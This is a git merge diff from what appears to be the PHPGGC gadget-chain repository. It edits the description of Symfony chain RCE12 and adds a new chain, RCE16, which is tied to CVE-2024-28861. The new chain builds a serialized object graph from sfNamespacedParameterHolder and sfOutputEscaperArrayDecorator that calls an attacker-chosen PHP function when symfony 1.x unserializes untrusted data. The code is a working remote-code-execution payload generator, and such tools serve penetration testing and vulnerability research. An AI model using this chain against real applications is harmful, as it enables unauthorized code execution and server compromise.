Merge branch 'darkpills-master'

Author: cfreal

gadgetchains/Symfony/RCE/12/chain.php

@@ -7,7 +7,7 @@ class RCE12 extends \PHPGGC\GadgetChain\RCE\FunctionCall
     public static $version = '1.3.0 <= 1.5.13~17';
     public static $vector = '__destruct';
     public static $author = 'darkpills';
-    public static $information = 'Works until 1.5.13, and until 1.5.17 if installed via git method (not composer)';
+    public static $information = 'Works until 1.5.13, and until 1.5.17 if installed via git method, not composer (CVE-2024-28859)';
 
     public function generate(array $parameters)
     {

gadgetchains/Symfony/RCE/16/chain.php

@@ -0,0 +1,18 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE16 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.1.0 <= 1.5.18';
+    public static $vector = 'Serializable';
+    public static $author = 'darkpills';
+    public static $information = 'CVE-2024-28861';
+
+    public function generate(array $parameters)
+    {
+        $escaper = new \sfOutputEscaperArrayDecorator($parameters['function'], array($parameters['parameter']));
+        $tableInfo = new \sfNamespacedParameterHolder($escaper); 
+        return $tableInfo;
+    }
+}

gadgetchains/Symfony/RCE/16/gadgets.php

@@ -0,0 +1,33 @@
+<?php
+
+class sfOutputEscaperArrayDecorator
+{
+    protected $value;
+
+    protected $escapingMethod;
+
+    public function __construct($escapingMethod, $value)
+    {
+        $this->escapingMethod = $escapingMethod;
+        $this->value = $value;
+    }
+}
+
+class sfNamespacedParameterHolder implements Serializable
+{
+    protected $prop = null;
+
+    public function __construct($prop)
+    {
+        $this->prop = $prop;
+    }
+
+    public function serialize()
+    {
+        return serialize($this->prop);
+    }
+
+    public function unserialize($serialized)
+    {
+    }
+}